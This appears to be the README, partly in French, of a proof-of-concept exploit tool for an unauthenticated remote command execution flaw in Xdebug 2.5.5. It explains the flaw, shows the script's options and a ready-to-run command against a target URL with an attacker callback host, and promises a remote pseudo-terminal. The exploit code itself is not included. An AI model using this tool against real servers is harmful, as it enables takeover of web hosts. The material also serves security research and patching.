
POC exploit for CVE-2015-10141
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141
Une vulnérabilité d'injection de commandes OS non authentifiée existe dans Xdebug versions 2.5.5 et antérieures, une extension de débogage PHP. Lorsque le débogage à distance est activé, Xdebug écoute sur le port 9000 et accepte les commandes du protocole de débogage sans authentification. Un attaquant peut envoyer une commande eval conçue via cette interface pour exécuter du code PHP arbitraire, ce qui peut invoquer des fonctions système telles que system() ou passthru(). Cela entraîne une compromission totale de l'hôte sous les privilèges de l'utilisateur du serveur web.
usage: CVE-2015-10141.py [-h] -u URL -l LHOST
CVE-2015-10141 - xdebug v2.5.5 RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL URL of the target
-l, --lhost LHOST LHOST to trigger the RCE
Exécutez simplement l'exploit et fournissez une URL valide avec un fichier PHP comme index.php ainsi que l'hôte local. Ensuite, l'exploit tentera d'établir un pseudo-terminal qui vous permettra d'exécuter des commandes à distance.
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
(Prenez en compte que dans certains cas, la sortie ne sera pas du tout reflétée et vous ne verrez que la première ligne de la commande exécutée ; ce n'est pas un problème du script, la vulnérabilité fonctionne ainsi.)
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210
Ce projet est sous licence MIT
Copyright © 2025, D3Ext